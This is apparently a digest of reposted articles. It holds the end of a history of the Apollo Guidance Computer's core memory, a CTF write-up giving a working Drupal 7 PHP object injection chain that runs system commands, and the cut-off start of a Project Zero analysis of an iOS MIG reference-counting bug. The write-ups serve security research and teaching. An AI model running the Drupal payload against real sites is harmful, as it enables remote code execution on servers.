The photo below shows the Erasable Memory module after removing it from the tray. Unlike the other modules, this module has a black metal cover. Internally, the cores are encapsulated in Silastic (silicone rubber), which is then encapsulated in epoxy. This was intended to protect the delicate cores inside, but it took NASA a couple of tries to get the encapsulation right. Early modules (including ours) were susceptible to wire breakages from vibrations. At the bottom of the modules are the gold-plated pins that plug into the backplane.

The erasable core memory module from the Apollo Guidance Computer.

Core memory used planes of cores, one plane for each bit in the word. The AGC had 16 planes (which were called mats), each holding 2048 bits in a 64×32 grid. Note that each mat consists of eight 16×16 squares. The diagram below shows the wiring of the single sense line through a mat. The X/Y lines were wired horizontally and vertically. The inhibit line passed through all the cores in the mat; unlike the diagonal sense line, it ran vertically.

The sense line wiring in an AGC core plane (mat). The 2048 cores are in a 64×32 grid.

Most computers physically stacked the core planes on top of each other, but the AGC used a different mechanical structure, folding the mats (planes) to fit compactly in the module. The mats were accordion-folded to fit tightly into the module as shown in the diagram below. (Each of the 16 mats is outlined in cyan.) When folded, the mats formed a block (oriented vertically in the diagram below) that was mounted horizontally in the core module.

This folding diagram shows how 16 mats are folded into the core module. (Each cyan rectangle indicates a mat.)

The photo below shows the memory module with the cover removed. (This is a module on display at the CHM, not our module.) Most of the module is potted with epoxy, so the cores are not visible. The most noticeable feature is the L-shaped wires on top. These connect the X and Y pins to 192 diodes. (The purpose of the diodes will be explained later.) The diodes are hidden underneath this wiring in two layers, mounted horizontally cordwood-style. The leads from the diodes are visible as they emerge and connect to terminals on top of the black epoxy.

The AGC's memory module with the cover removed. This module is on display at the CHM. Photo courtesy of Mike Stewart.

Marc took X-rays of the module and I stitched the photos together (below) to form an image looking down into the module. The four rows of core mats in the folding diagram correspond to the four dark blocks. You can also see the two rows of diodes as two darker horizontal stripes.
At this resolution, the wires through the cores and the tangled mess of wires to the pins are not visible; these are very thin 38-gauge wires, much thinner than the wires to the diodes.

Composite X-ray image of the core memory module. The stitching isn't perfect in the image because the parallax and perspective changed in each image. In particular, the pins appear skewed in different directions.

The diagram below shows a cross-section of the memory module. (The front of the module above corresponds to the right side of the diagram.) The diagram shows how the two layers of diodes (blue) are arranged at the top, and are wired (red) to the core stack (green) through the "feed thru". Also note how the pins (yellow) at the bottom of the module rise up through the epoxy and are connected by wires (red) to the core stack.

Cross-section of memory module showing internal wiring. From Apollo Computer Design Review, page 9-39. (Original Block II design.)

Addressing a memory location

The AGC's core memory holds 2048 words in a 64×32 matrix. To select a word, one of the 64 X select lines is energized along with one of the 32 Y select lines. One of the challenges of a core memory system is driving the X and Y select lines. These lines need to be driven at high current (hundreds of milliamps). In addition, the read and write currents flow in opposite directions, so the lines need bidirectional drivers. Finally, the number of X and Y lines is fairly large (64 + 32 for the AGC), so using a complex driver circuit on each line would be too bulky and expensive. In this section, I'll describe the circuitry in the AGC that energizes the right select lines for a particular address.

The AGC uses a clever trick to minimize the hardware required to drive the X and Y select lines. Instead of using 64 X line drivers, the AGC has 8 X drivers at the top of the matrix and 8 at the bottom of the matrix. Each of the 64 select lines is connected to a different top and bottom driver pair, so energizing a top driver and a bottom driver produces current through a single X select line. Thus, only 8+8 X drivers are required rather than 64.6 The Y drivers are similar, using 4 on one side and 8 on the other. The downside of this approach is that 192 diodes are required to prevent "sneak paths" through multiple select lines.7

Illustration of how "top" and "bottom" drivers work together to select a single line through the core matrix. Original diagram here.

The diagram above demonstrates this technique for the vertical lines in a hypothetical 9×5 core array. There are three "top" drivers (A, B and C) and three "bottom" drivers (1, 2 and 3). If driver B is energized positive and driver 1 is energized negative, current flows through the core line highlighted in red. Reversing the polarity of the drivers reverses the current flow, and energizing different drivers selects a different line. To see the need for diodes, note that in the diagram above, current could flow from B to 2, up to A and finally down to 1, for instance, incorrectly energizing multiple lines.

The address decoder logic is in tray "A" of the AGC, implemented in several logic modules.9 The AGC's logic is built entirely from 3-input NOR gates (two per integrated circuit), and the address decoder is no exception. The image below shows logic module A14. (The other logic modules look essentially the same, but the internal printed circuit board is wired differently.)
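Before descending into the logic-module hardware, the top/bottom pairing trick described above is easy to capture in a few lines of code. This is a toy model for illustration only, obviously nothing like the AGC's actual circuitry:

# Toy model: 8 "top" and 8 "bottom" drivers select one of 64 X lines,
# so 16 driver circuits replace 64.
def x_drivers(x_line):            # x_line in 0..63
    top = x_line // 8             # which of the 8 top drivers to energize
    bottom = x_line % 8           # which of the 8 bottom drivers to energize
    return top, bottom

# Every (top, bottom) pair is distinct, so each pair selects exactly one line.
assert len({x_drivers(x) for x in range(64)}) == 64
print(x_drivers(42))              # line 42 -> top driver 5, bottom driver 2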
The logic modules all have a similar design: two rows of 30 ICs on each side, for 120 ICs in total, or 240 3-input NOR gates. (Module A14 has one blank location on each side, for 118 ICs in total.) The logic module plugs into the AGC via the four rows of pins at the bottom.10

Much of the address decoding is implemented in logic module A14. Photo courtesy of Mike Stewart.

The diagram below shows the circuit that generates one of the select signals (XB6, X bottom 6).11 The NOR gate outputs a 1 if the inputs are 110 (i.e. 6). The other select signals are generated with similar circuits, using different address bits as inputs.

This address decode circuit generates one of the select signals. The AGC has 28 decode circuits similar to this.

Each integrated circuit implemented two NOR gates using RTL (resistor-transistor logic), an early logic family. These ICs were costly; they cost $20-$30 each (around $150 in current dollars). There wasn't much inside each IC, just three transistors and eight resistors. Even so, the ICs provided a density improvement over the planned core-transistor logic, making the AGC possible. The decision to use ICs in the AGC was made in 1962, amazingly just four years after the IC was invented. The AGC was the largest consumer of ICs from 1962 to 1965 and ended up being a major driver of the integrated circuit industry.

Each IC contains two NOR gates implemented with resistor-transistor logic. From Schematic 2005011.

The die photo below shows the internal structure of the NOR gate; the metal layer of the silicon chip is most visible.12 The top half is one NOR gate and the bottom half is the other. The metal wires connect the die to the 10-pin package. The transistors are clumped together in the middle of the chip, surrounded by the resistors.

Die photo of the dual 3-input NOR gate used in the AGC. Pins are numbered counterclockwise; pin 3 is to the right of the "P". Photo by Lisa Young, Smithsonian.

Erasable Driver Modules

Next, the Erasable Driver module converts the 4-volt logic-level signals from the address decoder into 14-volt pulses with controlled current. The AGC has two identical Erasable Driver modules, in slots B9 and B10.5 Two modules are required due to the large number of signals: 28 select lines (X and Y, top and bottom), 16 inhibit lines (one for each bit), and a dozen control signals.

The select line driver circuits are simple transistor switching circuits: a transistor and two resistors. Other circuits, such as the inhibit line drivers, are a bit more complex because the shape and current of the pulse need to be carefully matched to the core module. This circuit uses three transistors, an inductor, and a handful of resistors and diodes. The resistor values are carefully selected during manufacturing to provide the desired current.

The erasable driver module, front and back. Photo courtesy of Mike Stewart.

This module, like the other non-logic modules, is built using cordwood construction. In this high-density construction, components were inserted into holes in the module, passing through from one side of the module to the other, with their leads exiting on either side. (Except for transistors, which have all three leads on the same side.) On each side of the module, point-to-point wiring connected the components with welded connections. In the photo below, note the transistors (golden, labeled with Q), resistors (R), diodes (CR for crystal rectifier, with K indicating the cathode), large capacitors (C), inductor (L), and feed-throughs (FT).
A plastic sheet over the components conveniently labels them; for instance, "7Q1" means transistor Q1 of circuit 7 (one of a set of repeated circuits). These labels match the designations on the schematic. At the bottom are connections to the module pins. Modules that were flown on spacecraft were potted with epoxy so the components were protected against vibration. Fortunately, our AGC was used on the ground and left mostly unpotted, so the components are visible.

A closeup of the Erasable Driver module, showing the cordwood construction. Photo courtesy of Mike Stewart.

Current Switch Module

You might expect that the 14-volt pulses from the Erasable Driver modules would drive the X and Y lines in the core. However, the signals go through one more module, the Current Switch module, in slot B11 just above the core memory module. This module generates the bidirectional pulses necessary for the X and Y lines.

The driver circuits are very interesting, as each driver includes a switching core in the circuit. (These cores are much larger than the cores in the memory itself.)13 The driver uses two transistors: one for the read current, and the other for the write current in the opposite direction. The switching core acts kind of like an isolation transformer, providing the drive signal to the transistors. But the switching core also "remembers" which line is being used. During the read phase, the address decoder flips one of the cores. This generates a pulse that drives the transistor. During the write phase, the address decoder is not involved. Instead, a "reset" signal is sent through all the driver cores. Only the core that was flipped in the previous phase will flip back, generating a pulse that drives the other transistor. Thus, the driver core provides memory of which line is active, avoiding the need for a flip-flop or other latch.

The current switch module. (This one is from the CHM, as ours is encapsulated and there's nothing to see but black epoxy.) Photo courtesy of Mike Stewart.

The diagram below shows the schematic of one of the current switches. The heart of the circuit is the switching core. If the driver input is 1, winding A will flip the core when the set strobe is pulsed. This will produce pulses on the other windings; the positive pulse on winding B will turn on transistor Q55, pulling the output X line low for reading.14 The output is connected via eight diodes to eight X top lines through the core. A similar bottom select switch (without diodes) will pull X bottom lines high; the single X line with the top low and the bottom high will be energized, selecting that row.

For a write, the reset line is pulled low, energizing winding D. If the core had flipped earlier, it will flip back, generating a pulse on winding C that will turn on transistor Q56 and pull the output high. But if the core had not flipped earlier, nothing happens and the output remains inactive. As before, one X line and one Y line through the core planes will be selected, but this time the current is in the opposite direction, for a write.

Schematic of one of the current switches in the AGC. This switch is the driver for X top line 0. The schematic shows one of the 8 pairs of diodes connected to this driver.

The photo below shows one of the current switch circuits and its cordwood construction. The switching core is the 8-pin black module between the transistors. The core and the wires wound through it are encapsulated with epoxy, so there's not much to see.
At the bottom of the photo, you can see the Malco Mini-Wasp pins that connect the module to the backplane.

Closeup of one switch circuit in the Current Switch Module. The switching core (center) has transistors on either side.

Sense Amplifier Modules

When a core flips, the changing magnetic field induces a weak signal in the corresponding sense line. There are 16 sense lines, one for each bit in the word. The 16 sense amplifiers receive these signals, amplify them, and convert them to logic levels. The sense amplifiers are implemented using a special sense amplifier IC. (The AGC used only two different ICs: the sense amplifier and the NOR gate.) The AGC has two identical sense amplifier modules, in slots B13 and B14; module B13 is used by the erasable core memory, while B14 is used by the fixed memory (i.e. the core rope used for ROM).

The signal from the core first goes through an isolation transformer. It is then amplified by the IC, and the output is gated by a strobe transistor. The sense amplifier depends on carefully-controlled voltage levels for bias and thresholds. These voltages are produced by voltage regulators on the sense amplifier modules that use Zener diodes for regulation. The voltage levels are tuned during manufacturing by selecting resistor values and optional diodes, matching each sense amplifier module to the characteristics of the computer's core memory module.

The photo below shows one of the sense amp modules. The eight repeated units are eight sense amplifiers; the other eight sense amplifiers are on the other side of the module. The reddish circles are the pulse transformers, while the lower circles are the sense amplifier ICs. The voltage regulation is in the middle and right of the module. On top of the module (front in the photo) you can see the horizontal lines of the nickel ribbon that connects the circuits; it is somewhat similar to a printed circuit board.

Sense amplifier module with top removed. Note the nickel ribbon interconnect at the top of the module.

The photo below shows a closeup of the module. At the top are two amplifier integrated circuits in metal cans. Below are two reddish pulse transformers. An output driver transistor is between the pulse transformers.15 The resistors and capacitors are mounted using cordwood construction, so one end of each component is wired on this side of the module, and one on the other side. Note the row of connections at the top of the module; these connect to the nickel ribbon interconnect.

Closeup of the sense amplifier module for the AGC. The sense amplifier integrated circuits are at the top and the reddish pulse transformers are below. The pins are at the bottom, and the wires at the top go to the nickel ribbon, which is like a printed circuit board.

The diagram below shows the circuitry inside each sense amp integrated circuit. The sense amp chip is considerably more complex than the NOR gate IC. The chip receives the sense signal inputs from the pulse transformer and the differential amplifier amplifies the signal.16 If the signal exceeds a threshold, the IC outputs a 1 bit when clocked by the strobe.

Circuitry inside the sense amp integrated circuit for the AGC.

Writes

With core memory, the read operation and write operation are always done in pairs. Since a word is erased when it is read, it must then be written back, either with the original value or a new value. In the write cycle, the X and Y select lines are energized to flip the core to 1, using the opposite current from the read cycle.
Since the same X and Y select lines go through all the planes, all bits in the word would be set to 1. To store a 0 bit, each plane has an inhibit line that goes through all the cores in the plane. Energizing the inhibit line in the opposite direction to the X and Y select lines partially cancels out the current and prevents the core from receiving enough current to flip it, so the bit remains 0. Thus, by energizing the appropriate inhibit lines, any value can be written to the word in core. The 16 inhibit lines are driven by the Erasable Driver modules.

The broken wire

During the restoration, we tested the continuity of all the lines through the core module. Unfortunately, we discovered that the inhibit line for bit 16 is broken internally. NASA discovered in early testing that wires could be sheared inside the module, due to vibrations between the silicone encapsulation and the epoxy encapsulation. They fixed this problem in the later modules that were flown, but our module had the original faulty design. We attempted to find the location of the broken wire with X-rays, but couldn't spot the break. Time-domain reflectometry suggests the break is inconveniently located in the middle of the core planes. We are currently investigating options to deal with this. Marc has a series of AGC videos; the video below provides detail on the broken wire in the memory module.

Conclusion

Core memory was the best storage technology in the 1960s and the Apollo Guidance Computer used it to get to the Moon. In addition to the core memory module itself, the AGC required several modules of supporting circuitry. The AGC's logic circuits used early NOR-gate integrated circuits, while the analog circuits were built from discrete components and sense amplifier ICs using cordwood construction.

The erasable core memory in the AGC stored just 2K words. Because each bit in core memory required a separate physical ferrite core, density was limited. Once semiconductor memory became practical in the 1970s, it rapidly replaced core memory. The image below shows the amazing density difference between semiconductor memory and core memory: 64 bits of core take about the same space as 64 gigabytes of flash.

Core memory from the IBM 1401 compared with modern flash memory.

I announce my latest blog posts on Twitter, so follow me @kenshirriff for future articles. I also have an RSS feed. See the footnotes for Apollo manuals17 and more information sources18. Thanks to Mike Stewart for supplying images and extensive information.

Notes and references

1. The AGC restoration team consists of Mike Stewart (creator of FPGA AGC), Carl Claunch, Marc Verdiell (CuriousMarc on YouTube) and myself. The AGC that we're restoring belongs to a private owner who picked it up at a scrap yard in the 1970s after NASA scrapped it. For simplicity I refer to the AGC we're restoring as "our AGC". The Apollo flights had one AGC in the command module (the capsule that returned to Earth) and one AGC in the lunar module. In 1968, before the Moon missions, NASA tested a lunar module (with astronauts aboard) in a giant vacuum chamber in Houston to ensure that everything worked in space-like conditions. We believe our AGC was installed in that lunar module (LTA-8). Since this AGC was never flown, most of the modules are not potted with epoxy. ↩

2. We don't have core rope modules, but we have a core rope simulator from the 1970s.
Yes, we know about Francois; those are ropes for the earlier Block I Apollo Guidance Computer and are not compatible with our Block II AGC. ↩

3. Many people have asked if we talked to Fran about the DSKY. Yes, we have. ↩

4. There were alternative ways to wire a core plane. Using a diagonal sense wire reduced the noise in the sense wire from X and Y pulses, but some systems used a horizontal sense wire. Some core systems used the same wire for sense and inhibit (which simplified manufacturing), but that made noise rejection more complex. ↩

5. If you look carefully at the pictures of modules installed in the AGC, the Erasable Driver module in B10 is upside down. This is not a mistake, but how the system was designed. I assume this simplified the backplane wiring somehow, but it looks very strange. ↩

6. The IBM 1401 business computer, for example, used a different approach to generate the X and Y select lines. To generate the 50 X select signals, it used a 5×10 matrix of cores (separate from the actual memory cores). Two signals into the matrix were energized at the same time, flipping one of the 50 cores and generating a pulse on that line. Thus, only 5+10 drivers were needed instead of 50. The Y select signals were similar, using an 8×10 matrix. Details here. ↩

7. The AGC core memory required 192 diodes to prevent sneak paths, where a pulse could go backward through the wrong select lines. Each line required two diodes, since the lines are driven in one direction for read and the opposite direction for write. Since there are 64 X lines and 32 Y lines, 2×(64+32) = 192 diodes were required. These diodes were installed in two layers in the top of the core memory module. ↩

8. The memory address is mapped onto the select lines as follows. The eight X bottom signals are generated from the lowest address bits, S01, S02 and S03. (Bits in a word are numbered starting at 1, not 0.) Each decoder output has a NOR gate to select a particular bit pattern, along with four more NOR gates as buffers. The eight X top signals are generated from address bits S04, S05, and S06. The four Y bottom signals are generated from address bits S07 and S08. The eight Y top signals are generated from address bits EAD09, EAD10, and EAD11; these in turn were generated from S09 and S10 along with bank select bits EB9, EB10 and EB11. (The AGC used 12-bit addresses, allowing 4096 words to be addressed directly. Since the AGC had 38K of memory in total, it had a complex memory bank system to access the larger memory space.) ↩

9. For address decoding, the X drivers were in module A14, the Y top drivers were in A7, and the Y bottom drivers in A14. The memory address was held in the memory address register (the S register) in module A12, which also held a bit of decoding logic. Module A14 also held some memory timing logic. In general, the AGC's logic circuits weren't cleanly partitioned across modules, since making everything fit was more important than a nice design. ↩

10. One unusual thing to notice about the AGC's logic circuitry is that there are no bypass capacitors. Most integrated circuit logic has a bypass capacitor next to each IC to reduce noise, but NASA found that the AGC worked better without bypass capacitors. ↩

11. The "Blue-nose" gate doesn't have the pull-up resistor connected, making it open collector. It is presumably named after its blue appearance on blueprints. Blue-nose outputs can be connected together to form a NOR gate with more inputs.
In the case of the address decoder, the internal pull-up resistor is not used so the Erasable Driver module (B9/B10) can pull the signal up to BPLUS (+14V) rather than the +4V logic level. ↩

12. The AGC project used integrated circuits from multiple suppliers, so die photos from different sources show different layouts. ↩

13. The memory cores and the switching cores were physically very different. The cores in the memory module had a radius between 0.047 and 0.051 inches (about 1.2mm). The switching cores were much larger (either .249" or .187" depending on the part number) and had 20 to 50 turns of wire through them. ↩

14. For some reason, the inputs to the current switches are numbered starting at 0 (XT0E-XT7E) while the outputs are numbered starting at 1 (1AXBF-8AXBF). Just in case you try to understand the schematics. ↩

15. The output from the sense amplifiers is a bit confusing because the erasable core memory (RAM) and fixed rope core memory (ROM) outputs are wired together. The RAM has one sense amp module with 16 amplifiers in slot B13, and the ROM has its own identical sense amp module in slot B14. However, each module only has 8 output transistors. The two modules are wired together so 8 output bits are driven by transistors in the RAM's sense amp module and 8 output bits are driven by transistors in the ROM's sense amp module. (The motivation behind this is to use identical sense amp modules for RAM and ROM, while only needing 16 output transistors in total. Thus, the transistors are split up 8 to a module.) ↩

16. I'll give a bit more detail on the sense amps here. The key challenge with the sense amps is that the signal from a flipping core is small, and there are multiple sources of noise that the sense line can pick up. By using a differential signal (i.e. looking at the difference between the two inputs), noise that is picked up by both ends of the sense line (common-mode noise) can be rejected. The differential transformer improved the common-mode noise rejection by a factor of 30. (See page 9-16 of the Design Review.) The other factor is that the sense line goes through some cores in the same direction as the select lines, and through some cores in the opposite direction. This helps cancel out noise from the select lines. However, the consequence is that the pulse on the sense line may be positive or negative. Thus, the sense amp needed to handle pulses of either polarity; the threshold stage converted the bipolar signal to a binary output. ↩

17. The Apollo manuals provide detailed information on the memory system. The manual has a block diagram of the AGC's memory system. The address decoder is discussed in the manual starting at 4-416, and schematics are here. Schematics of the Erasable Driver modules are here and here; the circuit is discussed in section 4-5.8.3.3 of the manual. Schematics of the Current Switch module are here and here; the circuit is also discussed in section 4-5.8.3.3 of the manual. Sense amplifiers are discussed in section 4-5.8.3.4 of the manual, with schematics here and here. ↩

18. For more information on the AGC, the Virtual AGC site has tons of information on the AGC; in particular, the ElectroMechanical page has lots of schematics and drawings. There's a video of Eldon Hall, designer of the AGC, disassembling our AGC in 2004. If you want to try a simulated AGC in your browser, see moonjs. Eldon Hall's book Journey to the Moon: The History of the Apollo Guidance Computer is very interesting.
Also see Sunburst and Luminary: An Apollo Memoir by Don Eyles, who wrote a lot of the lunar landing code and discusses the famous program alarms. The Apollo Guidance Computer: Architecture and Operation is unevenly written and has errors, but its discussion in the last half of space navigation and a lunar mission is informative. ↩

Sursa: http://www.righto.com/2019/01/inside-apollo-guidance-computers-core.html
5. CTF Writeup: Complex Drupal POP Chain

29 Jan 2019 by Simon Scannell

A recent Capture-The-Flag tournament hosted by Insomni'hack challenged participants to craft an attack payload for Drupal 7. This blog post will demonstrate our solution for a PHP Object Injection with a complex POP gadget chain.

About the Challenge

The Droops challenge consisted of a website which had a modified version of Drupal 7.63 installed. The creators of the challenge added a cookie to the Drupal installation that contained a PHP serialized string, which would then be unserialized on the remote server, leading to a PHP Object Injection vulnerability. Finding the cookie was straightforward, and the challenge was obvious: finding and crafting a POP chain for Drupal. If you are not familiar with PHP Object Injections, we recommend reading our blog post about the basics of PHP Object Injections.

Drupal POP Chain to Drupalgeddon 2

We found the following POP chain in the Drupal source code that affects its cache mechanism. Through the POP chain it was possible to inject into the Drupal cache and abuse the same feature that led to the Drupalgeddon 2 vulnerability. No knowledge of this vulnerability is required to read this blog post, as each relevant step will be explained. The POP chain is a second-order Remote Code Execution, which means that it consists of two steps:

Injecting into the database cache the rendering engine uses
Exploiting the rendering engine and Drupalgeddon 2

Injecting into the cache

The DrupalCacheArray class in includes/bootstrap.inc implements a destructor and writes some data to the database cache with the method set(). This is the entry point of our gadget chain.

/**
 * Destructs the DrupalCacheArray object.
 */
public function __destruct() {
  $data = array();
  foreach ($this->keysToPersist as $offset => $persist) {
    if ($persist) {
      $data[$offset] = $this->storage[$offset];
    }
  }
  if (!empty($data)) {
    $this->set($data);
  }
}

The set() method will essentially call Drupal's cache_set() function with $this->cid, $data, and $this->bin, which are all under the control of the attacker since they are properties of the injected object. We assumed that we are now able to inject arbitrary data into the Drupal cache.

protected function set($data, $lock = TRUE) {
  // Lock cache writes to help avoid stampedes.
  // To implement locking for cache misses, override __construct().
  $lock_name = $this->cid . ':' . $this->bin;
  if (!$lock || lock_acquire($lock_name)) {
    if ($cached = cache_get($this->cid, $this->bin)) {
      $data = $cached->data + $data;
    }
    cache_set($this->cid, $data, $this->bin);
    if ($lock) {
      lock_release($lock_name);
    }
  }
}

In order to find out if this assumption was true, we started digging into the internals of the Drupal cache. We found out that the cache entries are stored in the database, and each cache type has its own table (a cache for forms, one for pages, and so on):

MariaDB [drupal7]> SHOW TABLES;
+-----------------------------+
| Tables_in_drupal7           |
+-----------------------------+
...
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
...

After a bit more digging around, we discovered that the table name is the equivalent of $this->bin. This means we can set bin to any cache type and inject into any cache table. But what can we do with this?
The next step was to analyze the different cache tables for interesting entries and their structure.

MariaDB [drupal7]> DESC cache_form;
+------------+--------------+------+-----+---------+-------+
| Field      | Type         | Null | Key | Default | Extra |
+------------+--------------+------+-----+---------+-------+
| cid        | varchar(255) | NO   | PRI |         |       |
| data       | longblob     | YES  |     | NULL    |       |
| expire     | int(11)      | NO   | MUL | 0       |       |
| created    | int(11)      | NO   |     | 0       |       |
| serialized | smallint(6)  | NO   |     | 0       |       |
+------------+--------------+------+-----+---------+-------+

For example, the cache_form table has a column called cid. As a reminder, one of the arguments to cache_set() was $this->cid. We assumed the following: $this->cid maps to the cid column of the cache table that is set in $this->bin; cid is the key of a cache entry; and the data column is simply the $data parameter of cache_set(). To verify all these assumptions, we created a serialized payload locally by creating a class in a build.php file and unserialized it on our test Drupal setup:

class SchemaCache {
  // Insert an entry with some cache_key
  protected $cid = "some_cache_key";
  // Insert it into the cache_form table
  protected $bin = "cache_form";
  protected $keysToPersist = array('input_data' => true);
  protected $storage = array('input_data' => array("arbitrary data!"));
}

$schema = new SchemaCache();
echo serialize($schema);

The reason we used the SchemaCache class here is that it extends the abstract class DrupalCacheArray, which cannot be instantiated on its own. The deserialization of this data led to the following entry in the cache_form table being created:

MariaDB [drupal7]> SELECT * FROM cache_form;
+----------------+-----------------------------------------------------------+--------+------------+------------+
| cid            | data                                                      | expire | created    | serialized |
+----------------+-----------------------------------------------------------+--------+------------+------------+
| some_cache_key | a:1:{s:10:"input_data";a:1:{i:0;s:15:"arbitrary data!";}} |      0 | 1548684864 |          1 |
+----------------+-----------------------------------------------------------+--------+------------+------------+

Using the injected cached data to gain Remote Code Execution

Since we were now able to inject arbitrary data into any caching table, we started to search for ways in which the cache was used by Drupal that could be leveraged to gain Remote Code Execution. After a bit of searching, we stumbled upon the following ajax callback, which can be triggered by making a request to the URL http://drupalurl.org/?q=system/ajax:

function ajax_form_callback() {
  list($form, $form_state, $form_id, $form_build_id, $commands) = ajax_get_form();
  drupal_process_form($form['#form_id'], $form, $form_state);
}

The ajax_get_form() function internally uses cache_get() to retrieve a cached entry from the cache_form table:

if ($cached = cache_get('form_' . $form_build_id, 'cache_form')) {
  $form = $cached->data;
  ...
  return $form;
}

This is interesting because it means it is possible to pass an arbitrary form render array to drupal_process_form(). As previously mentioned, the Drupalgeddon 2 vulnerability abused this feature, so chances were high that code execution could be achieved with the ability to inject arbitrary render arrays into the rendering engine.
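Jumping ahead a little: once a malicious render array has been cached under a cid such as form_1337, reaching this code path takes a single request. A hedged sketch of the trigger (the host is the write-up's placeholder, and the requests package is an assumption, not part of the original write-up):

import requests

# ajax_get_form() looks up "form_" . $form_build_id in cache_form, so
# form_build_id=1337 retrieves an injected entry stored under form_1337.
requests.post("http://drupalurl.org/?q=system/ajax",
              data={"form_build_id": "1337"})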
Within drupal_process_form(), we found the following lines of code:

if (isset($element['#process']) && !$element['#processed']) {
  foreach ($element['#process'] as $process) {
    $element = $process($element, $form_state, $form_state['complete form']);
  }

Here, $element refers to the $form received via cache_get(), meaning the keys and values of the array can be set arbitrarily. This means it is possible to simply set an arbitrary process (#process) callback and execute it with the render array as a parameter. Since the first argument is an array, it is not possible to simply call a function such as system() directly. What is required is a function that takes an array as input and leads to RCE. The drupal_process_attached() function seemed very promising:

function drupal_process_attached($elements, $group = JS_DEFAULT, $dependency_check = FALSE, $every_page = NULL) {
  ...
  foreach ($elements['#attached'] as $callback => $options) {
    if (function_exists($callback)) {
      foreach ($elements['#attached'][$callback] as $args) {
        call_user_func_array($callback, $args);
      }
    }
  }
  return $success;

Since all array keys and values can be set arbitrarily, it is possible to call an arbitrary function with arbitrary arguments via call_user_func_array(), which leads to RCE! This means the final POP chain looks like this:

<?php

class SchemaCache {
  // Insert an entry with some cache_key
  protected $cid = "form_1337";
  // Insert it into the cache_form table
  protected $bin = "cache_form";
  protected $keysToPersist = array(
    '#form_id' => true,
    '#process' => true,
    '#attached' => true
  );
  protected $storage = array(
    '#form_id' => 1337,
    '#process' => array('drupal_process_attached'),
    '#attached' => array(
      'system' => array(array('sleep 20'))
    )
  );
}

$schema = new SchemaCache();
echo serialize($schema);

All that is left to do is to trigger the PHP Object Injection vulnerability with the resulting serialized string and then make a POST request to http://drupalurl.org/?q=system/ajax with the POST parameter form_build_id set to 1337 to trigger the RCE.

Conclusion

POP chains can often become more complex and require a deeper knowledge of the application. However, the purpose of this blog post was to demonstrate that exploitation is still possible, even if no obvious, first-order POP chain exists. If we had not known that the rendering API of Drupal uses a lot of callbacks and has had vulnerabilities in the past, we probably would not have found this particular POP chain. Alternatively, deep PHP knowledge can also lead to working POP chains when no obvious POP chain can be found. There exists another POP chain: an Object Instantiation to Blind XXE to File Read to SQL Injection to RCE. A write-up for this POP chain was written by Paul Axe and can be found here. We would also like to thank the creators for creating this and the other amazing challenges for the Insomni'hack CTF 2019.

Tags: simon scannell, php, writeup, php object injection

Author: Simon Scannell, Security Researcher

Simon is a self-taught security researcher at RIPS Technologies and is passionate about web application security and coming up with new ways to find and exploit vulnerabilities. He currently focuses on the analysis of popular content management systems and their security architecture.

Sursa: https://blog.ripstech.com/2019/complex-drupal-pop-chain/
6. voucher_swap: Exploiting MIG reference counting in iOS 12

Tuesday, January 29, 2019
Posted by Brandon Azad, Project Zero

In this post I'll describe how I discovered and exploited CVE-2019-6225, a MIG reference counting vulnerability in XNU's task_swap_mach_voucher() function. We'll see how to exploit this bug on iOS 12.1.2 to build a fake kernel task port, giving us the ability to read and write arbitrary kernel memory. (This bug was independently discovered by @S0rryMybad.) In a later post, we'll look at how to use this bug as a starting point to analyze and bypass Apple's implementation of ARMv8.3 Pointer Authentication (PAC) on A12 devices like the iPhone XS.

A curious discovery

MIG is a tool that generates Mach message parsing code, and vulnerabilities resulting from violating MIG semantics are nothing new: for example, Ian Beer's async_wake exploited an issue where IOSurfaceRootUserClient would over-deallocate a Mach port managed by MIG semantics on iOS 11.1.2. Most prior MIG-related issues have been the result of MIG service routines not obeying semantics around object lifetimes and ownership. Usually, the MIG ownership rules are expressed as follows:

If a MIG service routine returns success, then it took ownership of all resources passed in.
If a MIG service routine returns failure, then it took ownership of none of the resources passed in.

Unfortunately, as we'll see, this description doesn't cover the full complexity of kernel objects managed by MIG, which can lead to unexpected bugs.

The journey started while investigating a reference count overflow in semaphore_destroy(), in which an error path through the function left the semaphore_t object with an additional reference. While looking at the autogenerated MIG function _Xsemaphore_destroy() that wraps semaphore_destroy(), I noticed that this function seems to obey non-conventional semantics. Here's the relevant code from _Xsemaphore_destroy():

task = convert_port_to_task(In0P->Head.msgh_request_port);

OutP->RetCode = semaphore_destroy(task,
        convert_port_to_semaphore(In0P->semaphore.name));
task_deallocate(task);
#if __MigKernelSpecificCode
if (OutP->RetCode != KERN_SUCCESS) {
    MIG_RETURN_ERROR(OutP, OutP->RetCode);
}

if (IP_VALID((ipc_port_t)In0P->semaphore.name))
    ipc_port_release_send((ipc_port_t)In0P->semaphore.name);
#endif /* __MigKernelSpecificCode */

The function convert_port_to_semaphore() takes a Mach port and produces a reference on the underlying semaphore object without consuming the reference on the port. If we assume that a correct implementation of the above code doesn't leak or consume extra references, then we can conclude the following intended semantics for semaphore_destroy():

On success, semaphore_destroy() should consume the semaphore reference.
On failure, semaphore_destroy() should still consume the semaphore reference.

Thus, semaphore_destroy() doesn't seem to follow the traditional rules of MIG semantics: a correct implementation always takes ownership of the semaphore object, regardless of whether the service routine returns success or failure. This of course begs the question: what are the full rules governing MIG semantics? And are there any instances of code violating these other MIG rules?

A bad swap

Not long into my investigation into extended MIG semantics, I discovered the function task_swap_mach_voucher().
This is the MIG definition from osfmk/mach/task.defs:

routine task_swap_mach_voucher(
        task        : task_t;
        new_voucher : ipc_voucher_t;
  inout old_voucher : ipc_voucher_t);

And here's the relevant code from _Xtask_swap_mach_voucher(), the autogenerated MIG wrapper:

mig_internal novalue _Xtask_swap_mach_voucher
        (mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP)
{
    ...
    kern_return_t RetCode;
    task_t task;
    ipc_voucher_t new_voucher;
    ipc_voucher_t old_voucher;
    ...
    task = convert_port_to_task(In0P->Head.msgh_request_port);
    new_voucher = convert_port_to_voucher(In0P->new_voucher.name);
    old_voucher = convert_port_to_voucher(In0P->old_voucher.name);
    RetCode = task_swap_mach_voucher(task, new_voucher, &old_voucher);
    ipc_voucher_release(new_voucher);
    task_deallocate(task);
    if (RetCode != KERN_SUCCESS) {
        MIG_RETURN_ERROR(OutP, RetCode);
    }
    ...
    if (IP_VALID((ipc_port_t)In0P->old_voucher.name))
        ipc_port_release_send((ipc_port_t)In0P->old_voucher.name);
